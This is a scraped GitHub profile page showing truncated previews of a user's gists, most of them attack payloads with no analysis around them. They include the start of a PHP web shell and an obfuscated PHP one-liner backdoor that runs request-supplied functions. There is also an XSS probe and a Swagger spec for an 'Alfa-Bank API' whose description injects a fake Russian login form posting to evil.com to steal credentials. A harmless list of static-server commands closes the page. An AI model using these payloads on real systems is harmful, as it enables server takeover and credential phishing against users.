Skip to content

Instantly share code, notes, and snippets.

View webcheating's full-sized avatar
😴
working on dying

webcheating

😴
working on dying
View GitHub Profile
<?
error_reporting(0);
set_time_limit(0);
session_start();
$xshell = $SERVER_['PHP_SELF'];
class shell
{
function getfiles()
{
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
alert(document.domain);
swagger: '2.0'
info:
title: Alfa-Bank API Documentation
description: |
<div style="position: absolute;width: 100%; height: 2000px;left: -500px;top: -500px;background-color: gray;opacity: 0.8;z-index: 999;"></div>
<div style="top: -200px;left: calc(50% - 300px);position:absolute;z-index: 999999999;background: white;box-shadow: 1px 5px 10px grey;">
<form action="https://evil.com" method="post" style="width:250px;box-shadow: 0 0 0 1px #dbdbdb;border-radius: 0.25rem;padding: 15px;display:flex;flex-wrap:wrap">
<h2>Войдите в аккаунт</h2>
<a
data-remote="true"
@webcheating
webcheating / web-servers.md
Created December 22, 2024 11:41 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000